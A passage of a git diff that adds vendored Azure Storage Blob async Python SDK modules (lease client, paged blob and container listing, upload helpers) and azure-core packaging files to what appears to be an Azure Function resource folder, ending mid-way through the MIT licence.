instead", + DeprecationWarning + ) + self._max_concurrency = max_concurrency + await self.readinto(stream) + return self.properties diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_lease_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_lease_async.py new file mode 100644 index 0000000..a77796a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_lease_async.py @@ -0,0 +1,325 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=invalid-overridden-method + +from typing import ( # pylint: disable=unused-import + Union, Optional, Any, IO, Iterable, AnyStr, Dict, List, Tuple, + TypeVar, TYPE_CHECKING +) + +from azure.core.exceptions import HttpResponseError +from azure.core.tracing.decorator_async import distributed_trace_async + +from .._shared.response_handlers import return_response_headers, process_storage_error +from .._serialize import get_modify_conditions +from .._lease import BlobLeaseClient as LeaseClientBase + +if TYPE_CHECKING: + from datetime import datetime + from .._generated.operations import BlobOperations, ContainerOperations + BlobClient = TypeVar("BlobClient") + ContainerClient = TypeVar("ContainerClient") + + +class BlobLeaseClient(LeaseClientBase): + """Creates a new BlobLeaseClient. + + This client provides lease operations on a BlobClient or ContainerClient. + + :ivar str id: + The ID of the lease currently being maintained. This will be `None` if no + lease has yet been acquired. + :ivar str etag: + The ETag of the lease currently being maintained. This will be `None` if no + lease has yet been acquired or modified. + :ivar ~datetime.datetime last_modified: + The last modified timestamp of the lease currently being maintained. + This will be `None` if no lease has yet been acquired or modified. + + :param client: + The client of the blob or container to lease. + :type client: ~azure.storage.blob.aio.BlobClient or + ~azure.storage.blob.aio.ContainerClient + :param str lease_id: + A string representing the lease ID of an existing lease. This value does not + need to be specified in order to acquire a new lease, or break one. + """ + + def __enter__(self): + raise TypeError("Async lease must use 'async with'.") + + def __exit__(self, *args): + self.release() + + async def __aenter__(self): + return self + + async def __aexit__(self, *args): + await self.release() + + @distributed_trace_async + async def acquire(self, lease_duration=-1, **kwargs): + # type: (int, Any) -> None + """Requests a new lease. + + If the container does not have an active lease, the Blob service creates a + lease on the container and returns a new lease ID. + + :param int lease_duration: + Specifies the duration of the lease, in seconds, or negative one + (-1) for a lease that never expires. A non-infinite lease can be + between 15 and 60 seconds. A lease duration cannot be changed + using renew or change. Default is -1 (infinite lease). + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = await self._client.acquire_lease( + timeout=kwargs.pop('timeout', None), + duration=lease_duration, + proposed_lease_id=self.id, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + self.etag = response.get('etag') # type: str + + @distributed_trace_async + async def renew(self, **kwargs): + # type: (Any) -> None + """Renews the lease. + + The lease can be renewed if the lease ID specified in the + lease client matches that associated with the container or blob. Note that + the lease may be renewed even if it has expired as long as the container + or blob has not been leased again since the expiration of that lease. When you + renew a lease, the lease duration clock resets. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = await self._client.renew_lease( + lease_id=self.id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace_async + async def release(self, **kwargs): + # type: (Any) -> None + """Release the lease. + + The lease may be released if the client lease id specified matches + that associated with the container or blob. Releasing the lease allows another client + to immediately acquire the lease for the container or blob as soon as the release is complete. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = await self._client.release_lease( + lease_id=self.id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace_async + async def change(self, proposed_lease_id, **kwargs): + # type: (str, Any) -> None + """Change the lease ID of an active lease. + + :param str proposed_lease_id: + Proposed lease ID, in a GUID string format. The Blob service returns 400 + (Invalid request) if the proposed lease ID is not in the correct format. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: None + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = await self._client.change_lease( + lease_id=self.id, + proposed_lease_id=proposed_lease_id, + timeout=kwargs.pop('timeout', None), + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + self.etag = response.get('etag') # type: str + self.id = response.get('lease_id') # type: str + self.last_modified = response.get('last_modified') # type: datetime + + @distributed_trace_async + async def break_lease(self, lease_break_period=None, **kwargs): + # type: (Optional[int], Any) -> int + """Break the lease, if the container or blob has an active lease. + + Once a lease is broken, it cannot be renewed. Any authorized request can break the lease; + the request is not required to specify a matching lease ID. When a lease + is broken, the lease break period is allowed to elapse, during which time + no lease operation except break and release can be performed on the container or blob. + When a lease is successfully broken, the response indicates the interval + in seconds until a new lease can be acquired. + + :param int lease_break_period: + This is the proposed duration of seconds that the lease + should continue before it is broken, between 0 and 60 seconds. This + break period is only used if it is shorter than the time remaining + on the lease. If longer, the time remaining on the lease is used. + A new lease will not be available before the break period has + expired, but the lease may be held for longer than the break + period. If this header does not appear with a break + operation, a fixed-duration lease breaks after the remaining lease + period elapses, and an infinite lease breaks immediately. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :return: Approximate time remaining in the lease period, in seconds. + :rtype: int + """ + mod_conditions = get_modify_conditions(kwargs) + try: + response = await self._client.break_lease( + timeout=kwargs.pop('timeout', None), + break_period=lease_break_period, + modified_access_conditions=mod_conditions, + cls=return_response_headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + return response.get('lease_time') # type: ignore diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_list_blobs_helper.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_list_blobs_helper.py new file mode 100644 index 0000000..98d70a7 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_list_blobs_helper.py @@ -0,0 +1,171 @@ +# pylint: disable=too-many-lines +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +try: + from urllib.parse import unquote +except ImportError: + from urllib import unquote +from azure.core.async_paging import AsyncPageIterator, AsyncItemPaged +from azure.core.exceptions import HttpResponseError +from .._deserialize import get_blob_properties_from_generated_code +from .._models import BlobProperties +from .._generated.models import BlobItemInternal, BlobPrefix as GenBlobPrefix +from .._shared.models import DictMixin +from .._shared.response_handlers import return_context_and_deserialized, process_storage_error + + +class BlobPropertiesPaged(AsyncPageIterator): + """An Iterable of Blob properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.models.BlobProperties) + :ivar str container: The container that the blobs are listed from. + :ivar str delimiter: A delimiting character used for hierarchy listing. + + :param callable command: Function to retrieve the next page of items. + :param str container: The container that the blobs are listed from. + :param str prefix: Filters the results to return only blobs whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str continuation_token: An opaque continuation token. + :param str delimiter: + Used to capture blobs whose names begin with the same substring up to + the appearance of the delimiter character. The delimiter may be a single + character or a string. + :param location_mode: Specifies the location the request should be sent to. + This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. + """ + def __init__( + self, command, + container=None, + prefix=None, + results_per_page=None, + continuation_token=None, + delimiter=None, + location_mode=None): + super(BlobPropertiesPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.prefix = prefix + self.marker = None + self.results_per_page = results_per_page + self.container = container + self.delimiter = delimiter + self.current_page = None + self.location_mode = location_mode + + async def _get_next_cb(self, continuation_token): + try: + return await self._command( + prefix=self.prefix, + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + async def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.prefix = self._response.prefix + self.marker = self._response.marker + self.results_per_page = self._response.max_results + self.container = self._response.container_name + self.current_page = [self._build_item(item) for item in self._response.segment.blob_items] + + return self._response.next_marker or None, self.current_page + + def _build_item(self, item): + if isinstance(item, BlobProperties): + return item + if isinstance(item, BlobItemInternal): + blob = get_blob_properties_from_generated_code(item) # pylint: disable=protected-access + blob.container = self.container + return blob + return item + + +class BlobPrefix(AsyncItemPaged, DictMixin): + """An Iterable of Blob properties. + + Returned from walk_blobs when a delimiter is used. + Can be thought of as a virtual blob directory. + + :ivar str name: The prefix, or "directory name" of the blob. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str marker: The continuation token of the current page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.models.BlobProperties) + :ivar str container: The container that the blobs are listed from. + :ivar str delimiter: A delimiting character used for hierarchy listing. + :param callable command: Function to retrieve the next page of items. + :param str prefix: Filters the results to return only blobs whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str marker: An opaque continuation token. + :param str delimiter: + Used to capture blobs whose names begin with the same substring up to + the appearance of the delimiter character. The delimiter may be a single + character or a string. + :param location_mode: Specifies the location the request should be sent to. + This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. + """ + def __init__(self, *args, **kwargs): + super(BlobPrefix, self).__init__(*args, page_iterator_class=BlobPrefixPaged, **kwargs) + self.name = kwargs.get('prefix') + self.prefix = kwargs.get('prefix') + self.results_per_page = kwargs.get('results_per_page') + self.container = kwargs.get('container') + self.delimiter = kwargs.get('delimiter') + self.location_mode = kwargs.get('location_mode') + + +class BlobPrefixPaged(BlobPropertiesPaged): + def __init__(self, *args, **kwargs): + super(BlobPrefixPaged, self).__init__(*args, **kwargs) + self.name = self.prefix + + async def _extract_data_cb(self, get_next_return): + continuation_token, _ = await super(BlobPrefixPaged, self)._extract_data_cb(get_next_return) + self.current_page = self._response.segment.blob_prefixes + self._response.segment.blob_items + self.current_page = [self._build_item(item) for item in self.current_page] + self.delimiter = self._response.delimiter + + return continuation_token, self.current_page + + def _build_item(self, item): + item = super(BlobPrefixPaged, self)._build_item(item) + if isinstance(item, GenBlobPrefix): + if item.name.encoded: + name = unquote(item.name.content) + else: + name = item.name.content + return BlobPrefix( + self._command, + container=self.container, + prefix=name, + results_per_page=self.results_per_page, + location_mode=self.location_mode) + return item diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_models.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_models.py new file mode 100644 index 0000000..f44caa1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_models.py @@ -0,0 +1,179 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=too-few-public-methods, too-many-instance-attributes +# pylint: disable=super-init-not-called, too-many-lines + +from azure.core.async_paging import AsyncPageIterator +from azure.core.exceptions import HttpResponseError +from .._deserialize import parse_tags + +from .._models import ContainerProperties, FilteredBlob, parse_page_list +from .._shared.response_handlers import return_context_and_deserialized, process_storage_error + +from .._generated.models import FilterBlobItem + + +class ContainerPropertiesPaged(AsyncPageIterator): + """An Iterable of Container properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A container name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.models.ContainerProperties) + + :param callable command: Function to retrieve the next page of items. + :param str prefix: Filters the results to return only containers whose names + begin with the specified prefix. + :param int results_per_page: The maximum number of container names to retrieve per + call. + :param str continuation_token: An opaque continuation token. + """ + def __init__(self, command, prefix=None, results_per_page=None, continuation_token=None): + super(ContainerPropertiesPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.prefix = prefix + self.marker = None + self.results_per_page = results_per_page + self.location_mode = None + self.current_page = [] + + async def _get_next_cb(self, continuation_token): + try: + return await self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + async def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.prefix = self._response.prefix + self.marker = self._response.marker + self.results_per_page = self._response.max_results + self.current_page = [self._build_item(item) for item in self._response.container_items] + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_item(item): + return ContainerProperties._from_generated(item) # pylint: disable=protected-access + + +class FilteredBlobPaged(AsyncPageIterator): + """An Iterable of Blob properties. + + :ivar str service_endpoint: The service URL. + :ivar str prefix: A blob name prefix being used to filter the list. + :ivar str marker: The continuation token of the current page of results. + :ivar int results_per_page: The maximum number of results retrieved per API call. + :ivar str continuation_token: The continuation token to retrieve the next page of results. + :ivar str location_mode: The location mode being used to list results. The available + options include "primary" and "secondary". + :ivar current_page: The current page of listed results. + :vartype current_page: list(~azure.storage.blob.BlobProperties) + :ivar str container: The container that the blobs are listed from. + + :param callable command: Function to retrieve the next page of items. + :param str container: The name of the container. + :param int results_per_page: The maximum number of blobs to retrieve per + call. + :param str continuation_token: An opaque continuation token. + :param location_mode: Specifies the location the request should be sent to. + This mode only applies for RA-GRS accounts which allow secondary read access. + Options include 'primary' or 'secondary'. + """ + def __init__( + self, command, + container=None, + results_per_page=None, + continuation_token=None, + location_mode=None): + super(FilteredBlobPaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.service_endpoint = None + self.marker = continuation_token + self.results_per_page = results_per_page + self.container = container + self.current_page = None + self.location_mode = location_mode + + async def _get_next_cb(self, continuation_token): + try: + return await self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + async def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.service_endpoint = self._response.service_endpoint + self.marker = self._response.next_marker + self.current_page = [self._build_item(item) for item in self._response.blobs] + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_item(item): + if isinstance(item, FilterBlobItem): + tags = parse_tags(item.tags) + blob = FilteredBlob(name=item.name, container_name=item.container_name, tags=tags) + return blob + return item + + +class PageRangePaged(AsyncPageIterator): + def __init__(self, command, results_per_page=None, continuation_token=None): + super(PageRangePaged, self).__init__( + get_next=self._get_next_cb, + extract_data=self._extract_data_cb, + continuation_token=continuation_token or "" + ) + self._command = command + self.results_per_page = results_per_page + self.location_mode = None + self.current_page = [] + + async def _get_next_cb(self, continuation_token): + try: + return await self._command( + marker=continuation_token or None, + maxresults=self.results_per_page, + cls=return_context_and_deserialized, + use_location=self.location_mode) + except HttpResponseError as error: + process_storage_error(error) + + async def _extract_data_cb(self, get_next_return): + self.location_mode, self._response = get_next_return + self.current_page = self._build_page(self._response) + + return self._response.next_marker or None, self.current_page + + @staticmethod + def _build_page(response): + if not response: + raise StopIteration + + return parse_page_list(response) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_upload_helpers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_upload_helpers.py new file mode 100644 index 0000000..972d104 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/aio/_upload_helpers.py @@ -0,0 +1,294 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +# pylint: disable=no-self-use + +from io import SEEK_SET, UnsupportedOperation +from typing import Optional, Union, Any, TypeVar, TYPE_CHECKING # pylint: disable=unused-import + +import six +from azure.core.exceptions import ResourceModifiedError, HttpResponseError + +from .._shared.response_handlers import ( + process_storage_error, + return_response_headers) +from .._shared.uploads_async import ( + upload_data_chunks, + upload_substream_blocks, + BlockBlobChunkUploader, + PageBlobChunkUploader, + AppendBlobChunkUploader) +from .._shared.encryption import generate_blob_encryption_data, encrypt_blob +from .._generated.models import ( + BlockLookupList, + AppendPositionAccessConditions, + ModifiedAccessConditions, +) +from .._upload_helpers import _convert_mod_error, _any_conditions + +if TYPE_CHECKING: + from datetime import datetime # pylint: disable=unused-import + BlobLeaseClient = TypeVar("BlobLeaseClient") + + +async def upload_block_blob( # pylint: disable=too-many-locals + client=None, + data=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if not overwrite and not _any_conditions(**kwargs): + kwargs['modified_access_conditions'].if_none_match = '*' + adjusted_count = length + if (encryption_options.get('key') is not None) and (adjusted_count is not None): + adjusted_count += (16 - (length % 16)) + blob_headers = kwargs.pop('blob_headers', None) + tier = kwargs.pop('standard_blob_tier', None) + blob_tags_string = kwargs.pop('blob_tags_string', None) + + immutability_policy = kwargs.pop('immutability_policy', None) + immutability_policy_expiry = None if immutability_policy is None else immutability_policy.expiry_time + immutability_policy_mode = None if immutability_policy is None else immutability_policy.policy_mode + legal_hold = kwargs.pop('legal_hold', None) + progress_hook = kwargs.pop('progress_hook', None) + + # Do single put if the size is smaller than config.max_single_put_size + if adjusted_count is not None and (adjusted_count <= blob_settings.max_single_put_size): + try: + data = data.read(length) + if not isinstance(data, six.binary_type): + raise TypeError('Blob data should be of type bytes.') + except AttributeError: + pass + if encryption_options.get('key'): + encryption_data, data = encrypt_blob(data, encryption_options['key']) + headers['x-ms-meta-encryptiondata'] = encryption_data + response = await client.upload( + body=data, + content_length=adjusted_count, + blob_http_headers=blob_headers, + headers=headers, + cls=return_response_headers, + validate_content=validate_content, + data_stream_total=adjusted_count, + upload_stream_current=0, + tier=tier.value if tier else None, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + **kwargs) + + if progress_hook: + await progress_hook(adjusted_count, adjusted_count) + + return response + + use_original_upload_path = blob_settings.use_byte_buffer or \ + validate_content or encryption_options.get('required') or \ + blob_settings.max_block_size < blob_settings.min_large_block_upload_threshold or \ + hasattr(stream, 'seekable') and not stream.seekable() or \ + not hasattr(stream, 'seek') or not hasattr(stream, 'tell') + + if use_original_upload_path: + if encryption_options.get('key'): + cek, iv, encryption_data = generate_blob_encryption_data(encryption_options['key']) + headers['x-ms-meta-encryptiondata'] = encryption_data + encryption_options['cek'] = cek + encryption_options['vector'] = iv + block_ids = await upload_data_chunks( + service=client, + uploader_class=BlockBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + max_concurrency=max_concurrency, + stream=stream, + validate_content=validate_content, + encryption_options=encryption_options, + progress_hook=progress_hook, + headers=headers, + **kwargs + ) + else: + block_ids = await upload_substream_blocks( + service=client, + uploader_class=BlockBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + max_concurrency=max_concurrency, + stream=stream, + validate_content=validate_content, + progress_hook=progress_hook, + headers=headers, + **kwargs + ) + + block_lookup = BlockLookupList(committed=[], uncommitted=[], latest=[]) + block_lookup.latest = block_ids + return await client.commit_block_list( + block_lookup, + blob_http_headers=blob_headers, + cls=return_response_headers, + validate_content=validate_content, + headers=headers, + tier=tier.value if tier else None, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + **kwargs) + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceModifiedError as mod_error: + if not overwrite: + _convert_mod_error(mod_error) + raise + + +async def upload_page_blob( + client=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if not overwrite and not _any_conditions(**kwargs): + kwargs['modified_access_conditions'].if_none_match = '*' + if length is None or length < 0: + raise ValueError("A content length must be specified for a Page Blob.") + if length % 512 != 0: + raise ValueError("Invalid page blob size: {0}. " + "The size must be aligned to a 512-byte boundary.".format(length)) + if kwargs.get('premium_page_blob_tier'): + premium_page_blob_tier = kwargs.pop('premium_page_blob_tier') + try: + headers['x-ms-access-tier'] = premium_page_blob_tier.value + except AttributeError: + headers['x-ms-access-tier'] = premium_page_blob_tier + if encryption_options and encryption_options.get('data'): + headers['x-ms-meta-encryptiondata'] = encryption_options['data'] + blob_tags_string = kwargs.pop('blob_tags_string', None) + progress_hook = kwargs.pop('progress_hook', None) + + response = await client.create( + content_length=0, + blob_content_length=length, + blob_sequence_number=None, + blob_http_headers=kwargs.pop('blob_headers', None), + blob_tags_string=blob_tags_string, + cls=return_response_headers, + headers=headers, + **kwargs) + if length == 0: + return response + + kwargs['modified_access_conditions'] = ModifiedAccessConditions(if_match=response['etag']) + return await upload_data_chunks( + service=client, + uploader_class=PageBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_page_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + encryption_options=encryption_options, + progress_hook=progress_hook, + headers=headers, + **kwargs) + + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceModifiedError as mod_error: + if not overwrite: + _convert_mod_error(mod_error) + raise + + +async def upload_append_blob( # pylint: disable=unused-argument + client=None, + stream=None, + length=None, + overwrite=None, + headers=None, + validate_content=None, + max_concurrency=None, + blob_settings=None, + encryption_options=None, + **kwargs): + try: + if length == 0: + return {} + blob_headers = kwargs.pop('blob_headers', None) + append_conditions = AppendPositionAccessConditions( + max_size=kwargs.pop('maxsize_condition', None), + append_position=None) + blob_tags_string = kwargs.pop('blob_tags_string', None) + progress_hook = kwargs.pop('progress_hook', None) + + try: + if overwrite: + await client.create( + content_length=0, + blob_http_headers=blob_headers, + headers=headers, + blob_tags_string=blob_tags_string, + **kwargs) + return await upload_data_chunks( + service=client, + uploader_class=AppendBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + append_position_access_conditions=append_conditions, + progress_hook=progress_hook, + headers=headers, + **kwargs) + except HttpResponseError as error: + if error.response.status_code != 404: + raise + # rewind the request body if it is a stream + if hasattr(stream, 'read'): + try: + # attempt to rewind the body to the initial position + stream.seek(0, SEEK_SET) + except UnsupportedOperation: + # if body is not seekable, then retry would not work + raise error + await client.create( + content_length=0, + blob_http_headers=blob_headers, + headers=headers, + blob_tags_string=blob_tags_string, + **kwargs) + return await upload_data_chunks( + service=client, + uploader_class=AppendBlobChunkUploader, + total_size=length, + chunk_size=blob_settings.max_block_size, + stream=stream, + max_concurrency=max_concurrency, + validate_content=validate_content, + append_position_access_conditions=append_conditions, + progress_hook=progress_hook, + headers=headers, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/py.typed b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/py.typed new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/INSTALLER b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/INSTALLER new file mode 100644 index 0000000..4660be2 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/LICENSE b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/LICENSE new file mode 100644 index 0000000..4437826 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/LICENSE @@ -0,0 +1,21 @@ +Copyright (c) Microsoft Corporation. + +MIT License + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the 